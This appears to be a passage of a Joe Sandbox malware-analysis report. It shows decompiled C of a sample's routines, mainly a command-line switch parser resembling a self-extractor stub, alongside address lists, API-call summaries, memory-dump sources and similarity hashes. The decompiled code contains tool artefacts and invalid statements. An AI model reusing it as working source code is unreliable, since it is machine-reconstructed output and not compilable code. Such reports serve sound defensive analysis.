                                                                                                                                                                                                        			E00214CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                        0x00214cc8
                                                                                                                                                                                                        0x00214ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: 79aa797134ace1dca36ead07da414fbbbe63b598fc074aa150c76f683ab745c3
                                                                                                                                                                                                        • Instruction ID: 433978e196ee71aaf323e9dbbd3668aa9bd62728b81d8eced848f9f1a6e92812
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79aa797134ace1dca36ead07da414fbbbe63b598fc074aa150c76f683ab745c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB0123100010CB78F001B42FC0C8853F1DD6C42607014020F50C41022CF3398118585
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 00215C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00215C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x218004; // 0x58ac7c6d
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00216CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00216E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x218004; // 0x58ac7c6d
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0021597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E002144B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x219124 = E00216285();
									_t75 = 0;
								}
								return E00216CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E002144B9(0, 0x521, 0x211140, 0, 0x40, 0);
												_t85 =  *0x218588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0021667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0021667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00215C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00211680(0x218c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0021667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0021667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x218a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00215C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x218b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x218a3a;
																}
																E00211680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0021658A(_t218, 0x104, 0x211140);
																if(E002131E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x218a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x218a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x218a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x218a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x218a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x219a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x219a2c =  *0x219a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x218d48 =  *0x218d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x219a2c =  *0x219a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x219a2c =  *0x219a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x218d48 =  *0x218d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x219a2c =  *0x219a2c | 0x00000004;
																										L70:
																										 *0x218a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x219a2c = 3;
																	 *0x218a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x218a2c != 0 &&  *0x218b3e == 0) {
						if(GetModuleFileNameA( *0x219a3c, 0x218b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E002166C8(0x218b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                        0x00215c9e
                                                                                                                                                                                                        0x00215ca9
                                                                                                                                                                                                        0x00215cb0
                                                                                                                                                                                                        0x00215cb3
                                                                                                                                                                                                        0x00215cb6
                                                                                                                                                                                                        0x00215cb7
                                                                                                                                                                                                        0x00215cb8
                                                                                                                                                                                                        0x00215cbd
                                                                                                                                                                                                        0x00216204
                                                                                                                                                                                                        0x00215ccb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215ccb
                                                                                                                                                                                                        0x00215cd3
                                                                                                                                                                                                        0x00215cd7
                                                                                                                                                                                                        0x00215cf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215cf4
                                                                                                                                                                                                        0x00215cf8
                                                                                                                                                                                                        0x00215d00
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d06
                                                                                                                                                                                                        0x00215d06
                                                                                                                                                                                                        0x00215d0e
                                                                                                                                                                                                        0x00215d10
                                                                                                                                                                                                        0x00215d12
                                                                                                                                                                                                        0x00215d14
                                                                                                                                                                                                        0x00215d15
                                                                                                                                                                                                        0x00215d17
                                                                                                                                                                                                        0x00215d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d19
                                                                                                                                                                                                        0x00215d19
                                                                                                                                                                                                        0x00215d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d3f
                                                                                                                                                                                                        0x00215d3f
                                                                                                                                                                                                        0x00215d4b
                                                                                                                                                                                                        0x00215d4b
                                                                                                                                                                                                        0x00215d4f
                                                                                                                                                                                                        0x00215d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d93
                                                                                                                                                                                                        0x00215d93
                                                                                                                                                                                                        0x00215d9a
                                                                                                                                                                                                        0x00215d9d
                                                                                                                                                                                                        0x00215d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d9e
                                                                                                                                                                                                        0x00215d51
                                                                                                                                                                                                        0x00215d5b
                                                                                                                                                                                                        0x00215d72
                                                                                                                                                                                                        0x002160fb
                                                                                                                                                                                                        0x002160fb
                                                                                                                                                                                                        0x00216207
                                                                                                                                                                                                        0x0021620a
                                                                                                                                                                                                        0x0021620b
                                                                                                                                                                                                        0x0021620e
                                                                                                                                                                                                        0x00216217
                                                                                                                                                                                                        0x00215d78
                                                                                                                                                                                                        0x00215d78
                                                                                                                                                                                                        0x00215d80
                                                                                                                                                                                                        0x00215d83
                                                                                                                                                                                                        0x00215d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d84
                                                                                                                                                                                                        0x00215d5d
                                                                                                                                                                                                        0x00215d5f
                                                                                                                                                                                                        0x00215d62
                                                                                                                                                                                                        0x00215d68
                                                                                                                                                                                                        0x00215d64
                                                                                                                                                                                                        0x00215d64
                                                                                                                                                                                                        0x00215d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d62
                                                                                                                                                                                                        0x00215d5b
                                                                                                                                                                                                        0x00215d4f
                                                                                                                                                                                                        0x00215d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d9f
                                                                                                                                                                                                        0x00215d9f
                                                                                                                                                                                                        0x00215da5
                                                                                                                                                                                                        0x00215dab
                                                                                                                                                                                                        0x00215dba
                                                                                                                                                                                                        0x00216218
                                                                                                                                                                                                        0x0021621d
                                                                                                                                                                                                        0x00216220
                                                                                                                                                                                                        0x00216221
                                                                                                                                                                                                        0x00216229
                                                                                                                                                                                                        0x00216230
                                                                                                                                                                                                        0x00216247
                                                                                                                                                                                                        0x0021626a
                                                                                                                                                                                                        0x00216272
                                                                                                                                                                                                        0x00216249
                                                                                                                                                                                                        0x00216255
                                                                                                                                                                                                        0x0021625f
                                                                                                                                                                                                        0x00216264
                                                                                                                                                                                                        0x00216264
                                                                                                                                                                                                        0x00216284
                                                                                                                                                                                                        0x00215dc0
                                                                                                                                                                                                        0x00215dc0
                                                                                                                                                                                                        0x00215dca
                                                                                                                                                                                                        0x00215e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215dcc
                                                                                                                                                                                                        0x00215dce
                                                                                                                                                                                                        0x00215e24
                                                                                                                                                                                                        0x00215e24
                                                                                                                                                                                                        0x00215e2c
                                                                                                                                                                                                        0x00215e47
                                                                                                                                                                                                        0x00215e4a
                                                                                                                                                                                                        0x002161d2
                                                                                                                                                                                                        0x002161e2
                                                                                                                                                                                                        0x002161e7
                                                                                                                                                                                                        0x002161ee
                                                                                                                                                                                                        0x002161f1
                                                                                                                                                                                                        0x002161f1
                                                                                                                                                                                                        0x002161f8
                                                                                                                                                                                                        0x002161f8
                                                                                                                                                                                                        0x00215e50
                                                                                                                                                                                                        0x00215e53
                                                                                                                                                                                                        0x00216109
                                                                                                                                                                                                        0x0021611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216125
                                                                                                                                                                                                        0x00216137
                                                                                                                                                                                                        0x0021613a
                                                                                                                                                                                                        0x0021613c
                                                                                                                                                                                                        0x0021613e
                                                                                                                                                                                                        0x0021613e
                                                                                                                                                                                                        0x00216141
                                                                                                                                                                                                        0x00216141
                                                                                                                                                                                                        0x00216143
                                                                                                                                                                                                        0x00216144
                                                                                                                                                                                                        0x0021614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216150
                                                                                                                                                                                                        0x00216152
                                                                                                                                                                                                        0x0021615c
                                                                                                                                                                                                        0x00216170
                                                                                                                                                                                                        0x00216172
                                                                                                                                                                                                        0x0021617c
                                                                                                                                                                                                        0x00216190
                                                                                                                                                                                                        0x00216190
                                                                                                                                                                                                        0x00216196
                                                                                                                                                                                                        0x002161a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002161ab
                                                                                                                                                                                                        0x002161b9
                                                                                                                                                                                                        0x002161c6
                                                                                                                                                                                                        0x002161c6
                                                                                                                                                                                                        0x0021617e
                                                                                                                                                                                                        0x00216180
                                                                                                                                                                                                        0x0021618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021618a
                                                                                                                                                                                                        0x0021615e
                                                                                                                                                                                                        0x00216160
                                                                                                                                                                                                        0x0021616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021616a
                                                                                                                                                                                                        0x0021615c
                                                                                                                                                                                                        0x0021614a
                                                                                                                                                                                                        0x0021610b
                                                                                                                                                                                                        0x0021610e
                                                                                                                                                                                                        0x0021610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e59
                                                                                                                                                                                                        0x00215e59
                                                                                                                                                                                                        0x00215e5c
                                                                                                                                                                                                        0x0021604f
                                                                                                                                                                                                        0x00216056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021605c
                                                                                                                                                                                                        0x0021606e
                                                                                                                                                                                                        0x00216071
                                                                                                                                                                                                        0x00216073
                                                                                                                                                                                                        0x00216075
                                                                                                                                                                                                        0x00216075
                                                                                                                                                                                                        0x00216078
                                                                                                                                                                                                        0x00216078
                                                                                                                                                                                                        0x0021607a
                                                                                                                                                                                                        0x0021607b
                                                                                                                                                                                                        0x00216081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216087
                                                                                                                                                                                                        0x00216087
                                                                                                                                                                                                        0x0021608d
                                                                                                                                                                                                        0x0021609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002160a2
                                                                                                                                                                                                        0x002160aa
                                                                                                                                                                                                        0x002160b2
                                                                                                                                                                                                        0x002160b7
                                                                                                                                                                                                        0x002160bd
                                                                                                                                                                                                        0x002160bf
                                                                                                                                                                                                        0x002160bf
                                                                                                                                                                                                        0x002160d6
                                                                                                                                                                                                        0x002160e0
                                                                                                                                                                                                        0x002160e7
                                                                                                                                                                                                        0x002160f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002160f5
                                                                                                                                                                                                        0x0021609c
                                                                                                                                                                                                        0x00216081
                                                                                                                                                                                                        0x00215e62
                                                                                                                                                                                                        0x00215e62
                                                                                                                                                                                                        0x00215e65
                                                                                                                                                                                                        0x00215fd3
                                                                                                                                                                                                        0x00215fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fef
                                                                                                                                                                                                        0x00215fef
                                                                                                                                                                                                        0x00215ff7
                                                                                                                                                                                                        0x00215ffd
                                                                                                                                                                                                        0x00216003
                                                                                                                                                                                                        0x00216006
                                                                                                                                                                                                        0x00216011
                                                                                                                                                                                                        0x00216014
                                                                                                                                                                                                        0x0021603d
                                                                                                                                                                                                        0x00216016
                                                                                                                                                                                                        0x00216018
                                                                                                                                                                                                        0x00216019
                                                                                                                                                                                                        0x0021601b
                                                                                                                                                                                                        0x00216033
                                                                                                                                                                                                        0x0021601d
                                                                                                                                                                                                        0x00216020
                                                                                                                                                                                                        0x00216029
                                                                                                                                                                                                        0x00216022
                                                                                                                                                                                                        0x00216022
                                                                                                                                                                                                        0x00216022
                                                                                                                                                                                                        0x00216020
                                                                                                                                                                                                        0x0021601b
                                                                                                                                                                                                        0x00216042
                                                                                                                                                                                                        0x00216044
                                                                                                                                                                                                        0x00216046
                                                                                                                                                                                                        0x0021604a
                                                                                                                                                                                                        0x00215ff7
                                                                                                                                                                                                        0x00215fd5
                                                                                                                                                                                                        0x00215fd8
                                                                                                                                                                                                        0x00215fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e6b
                                                                                                                                                                                                        0x00215e6b
                                                                                                                                                                                                        0x00215e6e
                                                                                                                                                                                                        0x00215f8b
                                                                                                                                                                                                        0x00215f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215f9f
                                                                                                                                                                                                        0x00215fa7
                                                                                                                                                                                                        0x00215faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fb1
                                                                                                                                                                                                        0x00215fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fb5
                                                                                                                                                                                                        0x00215fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215fb9
                                                                                                                                                                                                        0x00215fb7
                                                                                                                                                                                                        0x00215fb3
                                                                                                                                                                                                        0x00215faf
                                                                                                                                                                                                        0x00215f8d
                                                                                                                                                                                                        0x00215f8d
                                                                                                                                                                                                        0x00215f8d
                                                                                                                                                                                                        0x00215f8f
                                                                                                                                                                                                        0x00215fc1
                                                                                                                                                                                                        0x00215fc1
                                                                                                                                                                                                        0x00215fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e74
                                                                                                                                                                                                        0x00215e74
                                                                                                                                                                                                        0x00215e77
                                                                                                                                                                                                        0x00215ea0
                                                                                                                                                                                                        0x00215ebd
                                                                                                                                                                                                        0x00215f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215f7f
                                                                                                                                                                                                        0x00215ec3
                                                                                                                                                                                                        0x00215ec3
                                                                                                                                                                                                        0x00215ecc
                                                                                                                                                                                                        0x00215ed4
                                                                                                                                                                                                        0x00215ed6
                                                                                                                                                                                                        0x00215edc
                                                                                                                                                                                                        0x00215edf
                                                                                                                                                                                                        0x00215eea
                                                                                                                                                                                                        0x00215eed
                                                                                                                                                                                                        0x00215f3f
                                                                                                                                                                                                        0x00215f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215eef
                                                                                                                                                                                                        0x00215eef
                                                                                                                                                                                                        0x00215ef2
                                                                                                                                                                                                        0x00215f34
                                                                                                                                                                                                        0x00215ef4
                                                                                                                                                                                                        0x00215ef4
                                                                                                                                                                                                        0x00215ef7
                                                                                                                                                                                                        0x00215f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215ef9
                                                                                                                                                                                                        0x00215ef9
                                                                                                                                                                                                        0x00215efc
                                                                                                                                                                                                        0x00215f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215efe
                                                                                                                                                                                                        0x00215eff
                                                                                                                                                                                                        0x00215f02
                                                                                                                                                                                                        0x00215f16
                                                                                                                                                                                                        0x00215f04
                                                                                                                                                                                                        0x00215f07
                                                                                                                                                                                                        0x00215f0d
                                                                                                                                                                                                        0x00215f46
                                                                                                                                                                                                        0x00215f46
                                                                                                                                                                                                        0x00215f09
                                                                                                                                                                                                        0x00215f09
                                                                                                                                                                                                        0x00215f09
                                                                                                                                                                                                        0x00215f07
                                                                                                                                                                                                        0x00215f02
                                                                                                                                                                                                        0x00215efc
                                                                                                                                                                                                        0x00215ef7
                                                                                                                                                                                                        0x00215ef2
                                                                                                                                                                                                        0x00215f4c
                                                                                                                                                                                                        0x00215f4e
                                                                                                                                                                                                        0x00215f50
                                                                                                                                                                                                        0x00215f54
                                                                                                                                                                                                        0x00215ed4
                                                                                                                                                                                                        0x00215ea2
                                                                                                                                                                                                        0x00215ea4
                                                                                                                                                                                                        0x00215eaf
                                                                                                                                                                                                        0x00215eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e79
                                                                                                                                                                                                        0x00215e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e83
                                                                                                                                                                                                        0x00215e83
                                                                                                                                                                                                        0x00215e83
                                                                                                                                                                                                        0x00215e85
                                                                                                                                                                                                        0x00215e85
                                                                                                                                                                                                        0x00215e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215e94
                                                                                                                                                                                                        0x00215e8e
                                                                                                                                                                                                        0x00215e7d
                                                                                                                                                                                                        0x00215e77
                                                                                                                                                                                                        0x00215e6e
                                                                                                                                                                                                        0x00215e65
                                                                                                                                                                                                        0x00215e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215dd0
                                                                                                                                                                                                        0x00215dd0
                                                                                                                                                                                                        0x00215dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215dd0
                                                                                                                                                                                                        0x00215dce
                                                                                                                                                                                                        0x00215dca
                                                                                                                                                                                                        0x00215dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215d00
                                                                                                                                                                                                        0x00215dd9
                                                                                                                                                                                                        0x00215e04
                                                                                                                                                                                                        0x002161fe
                                                                                                                                                                                                        0x00215e0a
                                                                                                                                                                                                        0x00215e0c
                                                                                                                                                                                                        0x00215e17
                                                                                                                                                                                                        0x00215e17
                                                                                                                                                                                                        0x00215e04
                                                                                                                                                                                                        0x00216200
                                                                                                                                                                                                        0x00216200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00215CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00218B3E,00000104,00000000,?,?), ref: 00215DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00215E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00215EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00215F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00215FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00216008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 002160AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00211140,00000000,00000040,00000000), ref: 002161F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 002161F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
